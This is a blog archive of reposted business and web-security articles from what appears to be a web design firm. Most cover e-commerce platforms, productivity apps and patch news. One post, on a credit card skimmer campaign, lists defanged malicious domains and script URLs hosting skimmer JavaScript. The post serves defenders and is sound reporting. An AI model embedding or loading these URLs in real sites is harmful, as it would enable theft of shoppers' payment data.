Author: graphicdesigner

Looking for Shopify Alternatives? Try These Ecommerce Solutions

9 January,2020 E-Commerce No Comment Author: graphicdesigner

With over 800,000 businesses using the platform as 2020 begins, Shopify has become the go-to solution for many e-commerce store owners. The platform has grown considerably in recent years, with a vibrant app store helping to take stores to a new level. Yet, there are many excellent Shopify alternatives that may be a better fit for many online entrepreneurs.

Shopify won’t be for everyone and it can be wise to look at the competition before you make a commitment.

The following e-commerce solutions all have their merits, helping to make them viable Shopify Alternatives:

WooCommerce

WooCommerce is a plugin that turns a WordPress site into an e-commerce store.

The plugin is both free and open source, so was quickly able to grow in popularity.

To get the absolute best functionality, though, you will need some additional paid add-ons.

There are numerous add-ons that can be used to simplify tasks, including email marketing, payment integration, and dropshipping.

Users who like WordPress will often choose WooCommerce to continue with a familiar platform.

BigCommerce

BigCommerce is a hosted solution used by many different stores from smaller businesses through to large brands.

Along with the attractive store themes you would expect, BigCommerce includes many more advanced features.

You can integrate with payment processors like Braintree, Square, and Stripe, while advanced shipping features ensure you get up-to-date shipping costs.

Additionally, the reports and metrics help you make the right decisions about your business based on analytics.

Zoey

Zoey is accessible to beginners, but comes with enough functionality to satisfy more experienced users.

The included templates are attractive and professional, with the ability to adapt them to your needs.

While it may appeal to beginners, the pricing may be prohibitive to newbies without a sales track record.

Similar to the previous options, there is an app marketplace featuring a variety of quality extensions.

Volusion

Volusion aims to make building and operating a store as easy as possible.

Site design can be performed without any knowledge of code, while the sites are all hosted on Volusion servers.

The tool also includes features for SEO and social media management.

Volusion integrates with the major payment processors, allows for easy inventory management, and has an optimized checkout experience.

SquareSpace

SquareSpace is an adaptable product that lets you develop an entire sales process.

This includes making comprehensive design changes and building a custom checkout process.

You can make much more than a simple store, adding options for digital products, recurring subscriptions, and blogging.

Similar to previous products, you can choose to integrate many extensions for payment processing, email marketing, and more.

Big Cartel

Big Cartel is one of the simpler e-commerce solutions, suited for smaller sellers who won’t need to scale up.

The tool is often used by artists and musicians to sell their products, with a free option to get started.

When you intend to grow a large store with complex inventory, payment, and data requirements, Big Cartel won’t be the solution for you.

However, smaller sellers can get started immediately using the simple design and store management tools.

Conclusion

While Shopify will be the perfect solution for many businesses, others may prefer to choose a different path.

All of the solutions mentioned can work for the majority of e-commerce stores, allowing them to grow as their sales increase.

Choosing the right platform is important as it can be frustrating making a change to an established business.

Finding the platform that offers the appearance, functionality, and features you require will ensure you are set up for maximum success.

Source: Business2Community

These 14 Apps Will Make 2020 Your Most Productive Year Ever

26 December,2019 Uncategorized No Comment Author: graphicdesigner

Thanks to leap year, you get an extra day in 2020. But even 366 days can go by quickly—and get nibbled away by the time you waste on repetitive tasks, distractions, daydreaming, or just the lack of a clear plan to get things done. There’s no shortage of apps promising to save your time or manage it better. But beware: Some are so involved that they may end up being time killers themselves.

These apps and services can help you avoid the perils of under- or over-managing your time—and many of them are free. Some automate tasks, saving you from chores like sorting emails or filing in forms. Others provide smart to-do lists that keep you on track for work or life goals. Yet others encourage healthy habits, from reining in unbridled smartphone checking to making sure you exercise and drink enough water. But enough chit-chat: on with the list.

 

 

Planning: Microsoft To Do
List-making will be your easiest to-do item on this free, streamlined app that synchronizes through the cloud across your devices. Just click to make lists of tasks, under categories like “Work” or “Personal,” set due dates and reminders, and break large items into smaller steps. You can also collaborate in online groups, assigning tasks to different members. Fans of soon-to-be-discontinued app Wunderlist, which Microsoft bought, will find this all familiar—and can easily migrate from their Wunderlist setup. (Android, iOS, Windows, Mac, web)

Planning: Any.Do
Resembling Microsoft To Do, this freemiuim app adds some nifty power features. Chief among them: it integrates with your phone’s calendar to create a single interface showing both appointments and to do items. Any.Do offers subscription plans, beginning at $60 per year, with capabilities such as recurring reminders, location-based reminders (like “pick up milk” when you go by the store), productivity reports, and integration with business apps. (Android, iOS, Windows, Mac, web, smart watches, Alexa, Google Home, Slack)

 

 

Habit tracking: Productive
This app for Apple devices is a to-do list for the good things in life. It helps you get started with preconfigured to-do items such as “Eat fruits and veggies,” “Write in my journal,” and the elusive “Inbox zero.” You can configure any other good habits you like and set timeframes for each of them: daily, weekly, monthly, etc. A paid subscription (staring at $30 per year) adds nice-to-have bonuses, such as an unlimited number of habits and location-based reminders. (iOS, iPadOS, WatchOS)

Time tracking: Rescue time
Use Rescue Time, and you’ll get a good overview of how well you’re managing your waking hours. The free app tracks both the programs you use and the sites you visit on your computer or smartphone—assigning them to categories such as Design & Composition (for instance, time spent in Microsoft Word and Photoshop) or Social Networking (time spent on Twitter or Facebook). The mobile app also tracks how many times you pick up your phone. A paid version ($72 per year) offers a few extras, such as alerts after you’ve spent a set amount of time in one app. (Android, iOS, Windows, Mac, Linux, Chrome, Firefox)

 

 

Focusing: Forest
This $2 app makes avoiding distraction into a game. Activate the timer, and a virtual tree starts growing onscreen. If you make it through the time period you set without fiddling with your phone (the default is 10 minutes), a full tree emerges. Give into temptation, and dead wood appears instead. Use Forest to set aside focused work slots or phone-free time when with friends. A free Chrome extension provides the same benefits on your computer and can be set to block certain web sites like Facebook while the timer is running. (Android, iOS, Chrome)

Project managing: Trello
Track multiphase projects—for yourself or a small team—with this freemium service. You can create boards with columns for different stages of projects, such as “Brainstorm,” “Consolidate Input,” and “Signoff,” then create cards for individual projects or parts of projects, such as “Develop marketing plan.” As work progresses, you can drag items from column to column and assign team members to various parts of the projects. Trello’s free tier offers plenty for individuals and small teams. Paid plans start at $10 per user per month. (Android, iOS, Windows, Mac, web)

 

 

Scheduling: Doodle
Spare the long email chains when setting up a meeting. This freemium service lets you post an online calendar with possible meeting times and allow everyone who receives the link to check off what works for them. Upgrading to a paid account (starting at $48 per year) adds handy features such as syncing doodles to your online calendar and automatically emailing calendar invites to participants. Paying also eliminates the onslaught of advertising on the site. (Android, iOS, web)

Email sorting: Edison Mail
This free app (formerly called EasilyDo Mail) sorts your inbox into categories such as Travel, Bills & Receipts, Entertainment, and Subscriptions. Each box extracts relevant information—displaying upcoming and past flight and hotel reservations, for instance, or providing unsubscribe buttons for newsletters. Edison supports webmail like Gmail, Outlook, and Yahoo, as well as Exchange and IMAP email from your business domain. Note: Edison collects anonymized data to support its online trends data service, and formerly allowed human staffers to read user emails in order to train its machine learning. (Android, iOS, MacOS)

Researching: Pocket
It’s easy to find information on the web. And Mozilla’s free bookmarking service, which is integrated into the Firefox browser and available as an extension for Chrome, makes it easy to keep track of it until you have time to give it your full attention. Just click the icon to save a copy of any page to your online account. You can also add tags to organize the saved pages by topics. The mobile app allows you to browse from your phone and save pages from your mobile browser. (Android, iOS, web, Firefox, Chrome)

Researching: Google Alerts
Rather than skimming through the news or running manual searches, let Google compile research and automatically send an email digest. Just visit the search engine’s Alerts page, sign in with your free Google account, and enter search terms for the topics you want to follow. You can include multiple terms (such as names of companies) for each alert, configure as many alerts as you want, and refine alerts based on features such as regions or languages to include. (Web)

Networking: LinkedIn QR codes
Forget business cards (which you probably have already done anyway), and make connections instead through the QR code scanner in LinkedIn’s mobile app. Just tap the icon on the right end of the search bar to display your personal code for people to scan and to capture the code displayed on their screen. Invites to connect go out automatically from there. (Android, iOS)

Accessing Google: Google Assistant
The font of all knowledge is a constant companion for many of us. This voice-activated app provides the quickest way to access many of Google’s services, especially if you are on your phone or your hands are full (or you’re driving). Beyond web searches, you can ask Assistant to do things like check the weather, find movie times, provide driving directions, set reminders, and translate text or audio. You can also access utilities like timers or alarms, a calculator, or smart home controls. (Android, iOS, Google Home speakers, Wear OS)

Form filling: LastPass
Password managers are an essential tool to create, store, and auto-fill strong passwords for website logins. They also save time with lots of other online form filling, such as entering your address for deliveries or your credit card information for payments. The free LastPass app allows you to create profiles for this and other categories of information that you can enter with one click of its browser plugin button. The app itself is locked down with a main password, and all data you store in it is encrypted. Paid upgrade features for LastPass ($36 per year) are minimal, such as ability to share access with other people. (Android, iOS, MacOS, web, browser plug-ins)

Scanning: TurboScan
Sometimes the best way to file papers is to convert them into files. This $6 Android and iOS app uses your phone’s camera to create color or black-and-white PDF files of any documents you photograph, even something like a white board. It stores searchable copies on your phone and also allows easy sharing via email, AirDrop, or cloud services like Dropbox and Evernote. (Android, iOS)

 

Source: www.fastcompany.com

Small Business Technology Trends for 2020

26 December,2019 Uncategorized No Comment Author: graphicdesigner

As the owner of a small business, you are always looking for ways to improve your company. Here we’ve highlighted some of the key tech trends in 2020 for exactly that. Whether you’ve just launched your startup or are trying to keep your business at the forefront of innovation, new technology is constantly being created for you to take advantage of. Below we’ve highlighted some of the new ways you can grow your market, improve efficiency and protect your company.

Influencer marketing

Scrolling through your social media, it’s expected to find promotional and branded content. Today the highest-paid athletes in the world, such as Christiano Ronaldo, make more on Instagram than on the field. The technique of using a big name to sell something is not new however, social media platforms allow ads to appear on your screen with far more ease and subtly than traditional advertising. Instead of your company hiring a celebrity to appear in a commercial, that celebrity only needs to post online about the benefits of your product or service. This new age of advertising presents enormous benefits for your company if utilized well.

So why is having influencer outreach important? It’s simple; the experience is personalized. You have no choice when you’re watching TV regarding what pops up during a commercial break. But on social media, consumers have chosen who they follow. Maybe they follow someone because they appreciate their taste, their lifestyle or because they know them personally. All of these attributes cultivate a deeper trust towards a brand when a promotion comes from someone the consumer has actively elected to see in their day to day social media goings.

If you’re a small business, it’s most likely you can’t afford the assistance of celebrities or high profile influencers to grow your product, but that’s okay. Micro-influencers or influencers with smaller followings (think under 100,000 followers) often have a more loyal fan base and higher levels of engagement. Furthermore, those who follow micro-influencers are more likely to share a niche interest, and with proper market research you can reach an audience interested in checking out your brand.

Finally, keeping your brand active on social media is also important for those who might discover or further explore your business on such platforms. Just like when you meet someone new and search them up on social media, consumers are constantly checking out new businesses first through social media.

Digital healthcare

There are several benefits of the rise of digital healthcare that all small business owners should be aware of. Not only can it save time and money, but digital healthcare solutions are enabling fundamental changes to the job market that directly benefit small businesses.

There’s never a moment to waste when you’re running a small business. Digital healthcare is increasingly becoming an affordable way for employees to stay healthy while maintaining efficiency. In the past, if an employee of yours fell sick or experienced any number of conditions, they would have to take time off work to drive to the doctor’s office, sit around as they wait for their appointment, see the nurse, and sit around some more before finally being treated. This is all changing as new telehealth companies like PlushCare offer remote services for your employees.

This means an employee can see the doctor from their office. Online doctor appointments typically last 15 minutes with patients receiving a diagnosis and treatment plan, including any necessary prescriptions, in this time frame. By seeing a doctor from work employees save incredible amounts of time that can be spent working. Furthermore, remote appointments are not limited to a single doctor’s hours, and your employees will find it easy to book with a remote doctor before or after their workday. These appointments are cheaper for your business and your employees while also providing instant access to care. But there’s another aspect to telehealth and it’s a relationship with small businesses.

Digital healthcare solutions make healthcare more affordable for the growing workforce of contractors and freelancers who forgo employer-based insurance. More people feel comfortable giving up the comforts of traditional employment, such as health insurance because they have an affordable alternative in digital healthcare. This is highly beneficial to small businesses that cannot afford to give their workers’ health insurance. Having access to a network of contractors and freelancers saves your company money but also allows you to hire the people necessary to get the job done at a reduced cost. If you are hiring via the gig economy be sure to talk to your contractors about digital healthcare as an affordable healthcare solution, especially if you are not offering health insurance to these workers.

Cybersecurity

The importance of cybersecurity can not be understated. As 2020 rolls around, the functioning of big and small businesses alike will continue to move online. New software solutions are being developed to unify the functions of companies, allowing smoother communication across integrated platforms. While this process is great for your business overall, such centralization also demonstrates the need for increased cybersecurity measures. According to a poll from Insureon, only 16% of small business owners think they are risk of a cyberattack. Unfortunately, 61% of cyberattacks are actually launched against small businesses, and the average cost of a small hack is $86,500, according to internet security firm Kaspersky Labs. While such a cost might not hurt a major corporation, it could be a devastating amount for your small business.

There are several steps you can take to protect your business from cyberattacks,

  • Regularly update your software. Installing new software as it becomes available is critical to protecting your data. Delaying even the most routine updates can have catastrophic effects.
  • Ensuring point-of-sale systems is safe. Businesses that perform transactions online should invest in the end to end encryption software. Not only does this safeguard your business, but it also protects your consumers and their trust in your services.
  • Teaching employees how to spot malware and phishers. Small business owners have to be proactive in the protection of their company, including looking inwards at potential risks for human error. Hold a seminar with your employees to discuss what dangerous malware might disguise itself as.
  • Hiring an IT expert. If your company can afford to do so, hiring an IT expert is a must as the word continually shifts into the digital age. As a business owner, you don’t have the time or knowledge to do everything on your own, and no one can help keep your tech safer than an IT expert.

Being in the know about the different technological channels you can utilize in 2020 sets your business apart. Promoting and growing your brand via influencer marketing grants you access to a concentrated market of potential consumers and clients. Knowing how to maintain efficiency and affordability while keeping your employees healthy and factoring in the wellbeing of contractors in the gig economy, sets you up to have highly satisfied workers at a lower price point. A cybersecurity approach that protects your company against data breaches and hacks from the ground up ensures all aspects of your business are high functioning. Small businesses with a comprehensive approach and knowledge of the latest tech trends as they apply to a range of aspects of the business are better positioned to outperform those that take a narrow approach.

 

Source: www.business.com

Why Your Company’s Online Reputation Matters

19 December,2019 Business Advice No Comment Author: graphicdesigner

As a discipline, reputation management is still nascent in the Asia Pacific region. Caught up in the rallying cry to go digital, many brands are eager to appear in search results, but they are comparatively less focused on the realities of what exactly consumers see.

To the extent that some brands in the region do practice reputation management, most relegate it to a single person or department, such as customer service, digital marketing, or human resources. While engaging in any form of reputation management is a good start, it should not be compartmentalized into a specific box on the organizational chart.

Reputation management should be a companywide responsibility that affects several, if not all, external-facing departments. Many founders or C-level executives balk at the idea of committing significant resources to what they might assume is merely a cosmetic benefit. But this stereotype could not be farther from the truth.

satisfaction surveyFirst Impressions Go Digital 

When a stakeholder hears about your brand for the first time—be they a potential customer, employee, partner, or investor—they will almost always Google your company to learn more. What they see in the search results is essentially their first impression, except it’s even weightier than the first impressions we make as businesspeople at meetings, events, or conferences.

Unlike in-person meetings, where you can offset an initially bad first impression as you share more about yourself over the course of a conversation, there are no such opportunities online. Stakeholders who are put off by a negative employee review or a critical feature from a journalist when searching your brand will not give you a chance to explain yourself. They’ll simply click away from your site. Our attention spans online last a couple seconds at most, and you just wasted the few that someone gave you.

A negative or erroneous perception on the internet can stagnate growth and immediately compromise sales and marketing efforts. It can also scare away an investor or cause the perfect candidate to apply to a competitor. Despite the importance of reputation management, the only way for employees to understand its significance is to get it from the top down. Company leaders must communicate the importance of reputation management and operationalize it into a key performance indicator.

Each department should be assigned relevant channels for reputation management. For example, human resources can monitor Glassdoor and LinkedIn; digital marketing can keep an eye on Facebook, Twitter, and Google; and public relations can watch media outlets. The responsible departments must report on their assigned channels. The sharing of such vital information is a constant reminder that everyone must work together to build, improve and protect their brand’s online reputation. A key point to note here is that companies often fail because they don’t consult experts. Imagine a company engaging their HR team to do financial audits without having them trained or monitored by a finance expert. Similarly, it is important to engage digital reputation experts in your strategy development process.

In galvanizing the entire organization to practice reputation management, leaders must emphasize a proactive rather than reactive approach. The latter is all too common, especially in Asia. Brands will only take action around their reputation crisis or when a dissenting view appears online. Only then will they spring to action, summoning whatever resources they can to respond to the critical opinion, bury it amid more positive content, or work to delete the negativity if libelous or otherwise erroneous.

Rather than just responding to online issues as they arise, brands must be proactive, beginning with developing an overall online branding: What is it that they want to be known for? Determining a company’s messaging is just as important for reputation management as it is for public relations or any other communications function. Skipping this step—as many companies do in their rush to respond to dissenting online voices—also leads to poor branding and subsequent performance. Your company will come across as just another entity in a business world eager to uphold appearances rather than an organization responding` from a place of genuine authenticity.

The messaging that you devise for your reputation management should be treated as a living document. Your company should evaluate how its mission, vision, and values are reflected on the internet every quarter, or even more frequently if your company is experiencing rapid growth. Done correctly, proactive reputation management will create an online brand that all of your team members will be proud of. It will also mobilize your community of employees, clients, partners, and other stakeholders to further support the success of your company.

 

Source: www.enterpreneur.com

Millions of Sites Exposed by Flaw in Jetpack WordPress Plugin

12 December,2019 Wordpress No Comment Author: graphicdesigner

Admins and owners of WordPress websites are urged to immediately apply the Jetpack 7.9.1 critical security update to prevent potential attacks that could abuse a vulnerability that has existed since Jetpack 5.1.

You can update your installation to the 7.9.1 version through your dashboard, or manually download the Jetpack 7.9.1 release here.

Jetpack is an extremely popular WordPress plugin that provides free security, performance, and site management features including site backups, secure logins, malware scanning, and brute-force attack protection.

The plugin has over 5 million active installations, and it was developed and it is currently maintained by Automattic, the company behind WordPress.

Not yet exploited in the wild

The vulnerability was found in the way Jetpack processed embed code and Adham Sadaqah was the one credited for responsibly disclosing the security issue.

While not a lot of details were disclosed regarding the security flaw to protect the sites that haven’t yet updated, the announcement made by Jetpack says that the bug impacts all versions starting with the 5.1 release and going back as far as July 2017.

The Jetpack developers state that no evidence was discovered until the release of the critical Jetpack 7.9.1 security update that the vulnerability has been exploited in the wild.

Active Jetpack versions
Active Jetpack versions

“However, now that the update has been released, it is only a matter of time before someone tries to take advantage of this vulnerability,” the developers warn.

The development team also says that they worked with the WordPress.org Security Team to release patches for every version of Jetpack since 5.1 and that “most websites have been or will soon be automatically updated to a secured version.”

Millions already patched

At the moment over four million out of the more than five million WordPress websites that use Jetpack have already been updated according to its entry on the WordPress Plugins site.

“Versions released today include 5.1.1, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.4, 6.4.3, 6.5.1, 6.6.2, 6.7.1, 6.8.2, 6.9.1, 7.0.2, 7.1.2, 7.2.2, 7.3.2, 7.4.2, 7.5.4, 7.6.1, 7.7.3, 7.8.1, 7.9.1,” the Jetpack dev team says.
Jetpack downloads history
Jetpack downloads history

Jetpack received another security update to address an issue found during an internal audit of the Contact Form block in December 2018, and a critical security update patching a vulnerability in the way some Jetpack shortcodes were processed in May 2016.

Last year, hackers also found a method of installing backdoored plugins on WordPress websites using weakly protected WordPress.com accounts and the Jetpack plugin’s remote management feature.

 

Source: www.bleepingcomputer.com

Cyber Security Trends 2020 – How Unprepared Are We?

3 December,2019 Developers, What's New No Comment Author: graphicdesigner

Spending on cybersecurity is on an explosive rise. When new ransomware attacks occur every 14 seconds followed by infiltration attempts on large volumes of data putting millions of people at risk, cybersecurity ought to be discussed. As we usher into 2020, the scope of discussion has gone beyond the upcoming security products & services to new innovations in hacking. If you haven’t woken up to combat such attacks, you could be the next target.

Before 2019 ends, the US alone would have had spent USD 45 billion and that’s not just any other market cap figure. As per IDC, global spending on cybersecurity will touch USD 103 billion.

Increased Router-based attacks

Being positioned at the heart of the network operations, Routers monitor all the devices and hence, are low hanging fruits for hackers. Since they aren’t updated as frequently as recommended, Routers are prone to a series of attacks. Moreover, there is a swathe of models from different brands which makes it complicated for the manufacturers to upgrade or offer replacement to the older devices.

Such attacks are targeted to retrieve configuration files by exploiting commands such as SNMP and SMI. As per a report from Akamai, flaws in UPnP implementations empowered hackers to inject NAT rules while affecting 65,000 routers and 4.8 million more at risk.

Last year, Kaspersky reported a similar attack wherein systems in Russia and Iran were left with an ASCII rendition of the American Flag followed by a message ‘Don’t mess with our elections’.

Given the increase of routers under attacks, users, at homes, agencies and offices must take essential steps to ensure basic security. More than just changing the default router password in settings, it’s high time that users act proactively and learn about the security of their routers. They can access the router settings via the default IP 192.168.1.1 which is pre-specified by the router companies.

Henceforth, enabling WPA2 encryption, updating the router, using VPN and other 3rd party services can help to cut down the risks by 70%. In certain cases, changing the default IP altogether can curb the vulnerabilities.

Growth of 5G & increasing threats in the cloud

With impressive infrastructure deployments already in progression, 5G is prepared to grow in major markets such as India. In fact, IoT device manufacturers are experimenting with devices connecting directly with the 5G networks while not depending upon the Wi-Fi routers anymore. However, eliminating the central point of controlling networks at homes and small offices has raised the fears of making devices prone to more attacks. Routers are helpful in monitoring all the devices in the network and their absence means screening each one of them manually.

Following up with abundant data streaming capacities provided by 5G networks, cloud storage may not be the securest of all anymore. Given such bandwidth efficiency to back-up, upload and download huge volumes of data, hackers have already discovered their newer targets. At the enterprise level, this gets scarier as on-premise migration to the cloud continues to grow explosively. However, by 2020, 80% of such deals will attach network firewalls and secure web gateways to cloud-based access security brokers (CASBs).

Increasing use of mobile as an attack vector

By the end of 2018, mobiles had already topped the list of potential gateways to infiltration and hacking attempts. Since all our communications, whether personal or professional have moved to the mobile, we are inching towards a greater risk of exposing ourselves to the unknown, unintentionally. As per the RSA’s Current State of Cybercrime Whitepaper, 70% of fraudulent transactions were triggered by a mobile device in 2018. Not to miss, the 680% rise in frauds from mobile apps since 2015.

Phishing is back – stronger & scarier

Phishing may be old yet practiced full throttle. In fact, it has expanded into different versions such as smishing (phishing through SMS) or vishing (phishing through live calls). As per Verizon’s Data Breach Investigation Report 2019, phishing accounts for 32% of data breaches and 78% of cyberespionage incidents. These actions across emails, SMSs, social media posts and IRS phone calls lure the victim to give up personal information such as login credentials, or OTPs including transactions. Despite aggressive awareness campaigning, impersonating a reputed brand and extracting valuable information from the customer hasn’t stopped and it doesn’t look like stopping in 2020.

Going forward – hacking will get more innovative

Before you thought of deploying AI to predict attacks, hackers had already implemented strategies to dodge your preparations. Besides using automation for phishing (sending emails, social media messages), it could scan millions of systems, identify the ones most vulnerable and launch mass data infiltration attacks. Therefore, such abusive use of Artificial Intelligence deserves superlative defense such as – 50% of enterprises pledge to utilize AI tools to secure their systems.

 

Source: Business2Community

Google plans to give slow websites a new badge of shame in Chrome

25 November,2019 What's New No Comment Author: graphicdesigner

Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progress Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks

19 November,2019 E-Commerce, What's New No Comment Author: graphicdesigner

The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks’; but, it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical emote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (CSS) issues.

The warning comes as Magecart activity and infrastructure continues to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s javaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”

Credit Skimmers Vulnerability

14 November,2019 Developers, E-Commerce, What's New, Wordpress No Comment Author: graphicdesigner

We often write about malware that steal payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the ecommerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, Woocommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These Javascript files both contained the following injected code, found at the very top.

Magento WordPress Skimmer atob
Injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Created on 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild  injected into various e-commerce sites.

hxxps://jquerycodemagento[.]com/my/jd.js
hxxps://jquery-stats[.]com/u/redacted.js
hxxp:// jquery-web[.]com/wp/redacted.js
hxxps://tracker-visitors[.]com/my/jun.js
hxxps://gooqlemgrteg[.]com/ajax/jquery.js
hxxps://gooqleadvstat[.]com/ajax/maria.js
hxxps://jquerystatic[.]com/good/hard.js
…etc…

Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detects for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.

Protect Your Website ASAP!

It is estimated that about a third of all websites are outdated and seriously vulnerable to hacks. What are the chances that one of those sites could be yours? Don’t wait until it’s too late, get in touch with professionals and start protecting yourself today. Consultation is always FREE.

 

OR CALL NOW
(888) 766-3315

Shopify expands into email marketing

7 November,2019 E-Commerce, What's New No Comment Author: graphicdesigner

Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They also can see whether those emails actually lead to customers to add products to their carts/purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve doing for a decade and a half without calling it that.”